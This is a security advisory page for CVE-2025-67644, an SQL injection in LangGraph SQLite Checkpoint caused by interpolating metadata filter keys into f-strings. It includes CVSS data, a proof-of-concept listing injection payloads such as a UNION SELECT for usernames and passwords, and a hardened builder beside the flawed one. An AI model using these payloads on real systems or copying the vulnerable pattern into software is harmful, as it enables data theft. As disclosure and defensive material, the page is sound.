Security Vulnerability Report
CVE-2025-67644 CVSS 7.3 HIGH

CVE-2025-67644

Published: 2025-12-11 00:16:23
Last Modified: 2026-03-17 19:47:16

Description

LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:langchain:langgraph-checkpoint-sqlite:*:*:*:*:*:python:*:* - VULNERABLE
LangGraph SQLite Checkpoint <= 3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2025-67644: SQL Injection in LangGraph SQLite Checkpoint
# This demonstrates how malicious filter keys can manipulate SQL queries.
# No imports are needed: the script only simulates how the predicate string
# is built and never touches the package or a database. (The original
# listing imported sqlite3 and SqliteSaver but used neither.)


def exploit_sql_injection():
    """
    Demonstrates SQL injection vulnerability in LangGraph SQLite Checkpoint.
    The vulnerability exists in the _metadata_predicate() function.
    """
    # Normal usage (expected behavior)
    normal_filter = {"user_id": "123"}  # Filter by value (not vulnerable)

    # Malicious filter keys that exploit the vulnerability.
    # These keys are interpolated directly into SQL without validation.

    # Example 1: Always-true condition to extract all data
    malicious_key_1 = "1=1"  # Becomes: "1=1 = ?"

    # Example 2: Union-based injection attempt
    malicious_key_2 = "id UNION SELECT * FROM sqlite_master--"

    # Example 3: Boolean-based blind injection
    malicious_key_3 = "' OR (SELECT COUNT(*) FROM checkpoints) > 0 AND '1'='1"

    # Example 4: Extract sensitive data
    malicious_key_4 = "id) UNION SELECT username || ':' || password FROM users--"

    # Simulating how the vulnerable code constructs SQL:
    def vulnerable_metadata_predicate(filter_keys):
        """Vulnerable implementation (simplified)."""
        predicates = []
        for key in filter_keys:
            # Direct interpolation without validation - VULNERABLE!
            predicates.append(f"{key} = ?")
        return " AND ".join(predicates) if predicates else "1=1"

    # Demonstrating the vulnerability
    print("Vulnerable SQL construction:")
    print(f"Filter keys: {malicious_key_1}")
    print(f"SQL predicate: {vulnerable_metadata_predicate([malicious_key_1])}")
    print()
    print(f"Filter keys: {malicious_key_3}")
    print(f"SQL predicate: {vulnerable_metadata_predicate([malicious_key_3])}")


def demonstrate_impact():
    """Shows the potential impact of successful exploitation."""
    print("Potential impacts of CVE-2025-67644:")
    print("1. Unauthorized data access - Read all checkpoint data")
    print("2. Data modification - Alter or delete checkpoints")
    print("3. Data exfiltration - Extract sensitive information from DB")
    print("4. Database corruption - Modify schema or destroy data")
    print("5. Potential RCE - If SQLite is configured with certain extensions")


if __name__ == "__main__":
    exploit_sql_injection()
    demonstrate_impact()
```
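The PoC above stops at the predicate string. As an added example that is not part of this report or of the LangGraph project, the following models the flawed key-interpolation pattern next to one hardened alternative: every filter key is validated against a strict identifier pattern, and the JSON path is bound as a query parameter instead of being spliced into the SQL text. The `checkpoints` table layout, the `json_extract` query shape and the sample rows are assumptions made for the demonstration; the project's real schema and its 3.0.1 patch are not reproduced here.

```python
import json
import re
import sqlite3

# Constructed sample data (not real checkpoint rows): a thread id plus the
# JSON metadata that a checkpoint search would filter on.
SAMPLE_CHECKPOINTS = [
    ("thread-a", {"user_id": "123", "source": "input"}),
    ("thread-b", {"user_id": "456", "source": "loop"}),
    ("thread-c", {"user_id": "123", "source": "loop"}),
]

# Filter keys must look like plain identifiers; anything else is rejected
# before any SQL is built. Nested paths are deliberately not supported here.
KEY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def vulnerable_metadata_predicate(metadata_filter):
    """Model of the flawed pattern: the filter KEY is formatted into the SQL
    text, so only the VALUE is parameterised. Assumed query shape, not the
    project's actual code."""
    clauses, params = [], []
    for key, value in metadata_filter.items():
        clauses.append(f"json_extract(metadata, '$.{key}') = ?")
        params.append(value)
    return (" AND ".join(clauses) if clauses else "1=1"), params


def safe_metadata_predicate(metadata_filter):
    """Hardened builder: validate each key, then bind the JSON path as a
    parameter too, so no filter-derived text ever reaches the SQL grammar."""
    clauses, params = [], []
    for key, value in metadata_filter.items():
        if not isinstance(key, str) or not KEY_RE.fullmatch(key):
            raise ValueError(f"rejected metadata filter key: {key!r}")
        clauses.append("json_extract(metadata, ?) = ?")
        params.extend([f"$.{key}", value])
    return (" AND ".join(clauses) if clauses else "1=1"), params


def _build_db():
    """In-memory SQLite with a minimal, assumed checkpoints table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE checkpoints (thread_id TEXT, metadata TEXT)")
    conn.executemany(
        "INSERT INTO checkpoints VALUES (?, ?)",
        [(tid, json.dumps(md)) for tid, md in SAMPLE_CHECKPOINTS],
    )
    return conn


def search(metadata_filter, builder=safe_metadata_predicate):
    """Run a checkpoint search with the chosen predicate builder and return
    the matching thread ids in insertion order."""
    where, params = builder(metadata_filter)
    conn = _build_db()
    try:
        rows = conn.execute(
            f"SELECT thread_id FROM checkpoints WHERE {where}", params
        ).fetchall()
    finally:
        conn.close()
    return [row[0] for row in rows]


if __name__ == "__main__":
    # The PoC's first malicious key, as the flawed builder would embed it.
    print(vulnerable_metadata_predicate({"1=1": "x"})[0])
    print(search({"user_id": "123"}))  # legitimate filter works as before
    try:
        search({"1=1": "x"})  # same key through the hardened builder
    except ValueError as exc:
        print("blocked:", exc)
```

With a legitimate filter both builders return the same threads; with the PoC's `1=1` key the flawed builder embeds the key in the predicate text while the hardened one raises `ValueError` before a statement is assembled. Binding the path alone already removes the key from the SQL grammar; the identifier check is kept as defence in depth and as the place where an application decides which metadata keys callers may filter on at all.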

References

https://github.com/langchain-ai/langgraph/commit/297242913f8ad2143ee3e2f72e67db0911d48e2a (Patch)
https://github.com/langchain-ai/langgraph/security/advisories/GHSA-9rwj-6rc7-p77c (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-67644", "sourceIdentifier": "[email protected]", "published": "2025-12-11T00:16:23.230", "lastModified": "2026-03-17T19:47:15.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langgraph-checkpoint-sqlite:*:*:*:*:*:python:*:*", "versionEndExcluding": "3.0.1", "matchCriteriaId": "DCC0A08E-3556-412C-B86D-28892E29A30B"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langgraph/commit/297242913f8ad2143ee3e2f72e67db0911d48e2a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-9rwj-6rc7-p77c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```